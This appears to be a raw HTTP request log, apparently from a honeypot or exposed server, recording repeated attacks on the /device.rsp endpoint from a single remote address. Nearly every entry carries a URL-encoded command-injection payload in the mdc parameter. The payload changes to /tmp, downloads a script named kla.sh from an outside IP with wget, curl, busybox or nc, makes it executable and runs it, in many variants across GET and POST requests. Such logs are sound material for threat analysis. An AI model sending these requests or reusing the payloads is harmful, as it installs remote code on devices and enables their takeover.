Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos%0Acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 174
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:34886
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:44:48] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:34846
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos%0Acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos%0Acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: POST
[2026-02-22 20:44:42] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:37606
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Method: POST
[2026-02-22 20:44:35] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:37540
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos
Method: GET
[2026-02-22 20:44:30] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:53522
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:44:25] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%0acd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bsh+kla.sh+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 157
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:34962
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:44:20] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 669
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:34928
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:44:12] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:56366
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:44:06] === HTTP Request ===
===================
Body: mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdb=sos&opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:56282
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:44:01] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26%29
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:32946
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:43:54] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=%24%28wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26%29
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:43076
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:43:45] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:48914
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:43:39] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:60108
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox+wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-02-22 20:43:24] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:60092
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:43:19] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:47938
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:43:12] === HTTP Request ===
===================
Cookie: uid=admin
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:59618
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-02-22 20:43:07] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:59568
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-02-22 20:43:02] === HTTP Request ===
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:57796
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget+-qO-+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7Csh+-s+tbk+%26
Method: GET
[2026-02-22 20:42:57] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=admin
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:57742
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:42:52] === HTTP Request ===
===================
Body: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 169
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:56240
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:42:47] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:56208
Query: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:42:42] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:52992
Query: opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__S_O_S_T_R_E_A_MAX__&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:42:36] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:44646
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:42:31] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:44544
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+-O+kla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:42:22] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:55944
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:42:16] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:55854
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: POST
[2026-02-22 20:42:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:41134
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: GET
[2026-02-22 20:42:06] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:50278
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Method: GET
[2026-02-22 20:41:58] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:50204
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:41:53] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:58884
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:41:47] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:58852
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:41:42] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:48168
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:41:33] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:48116
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:41:29] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:49366
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-02-22 20:41:24] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:49308
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:41:18] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:39076
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:41:14] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
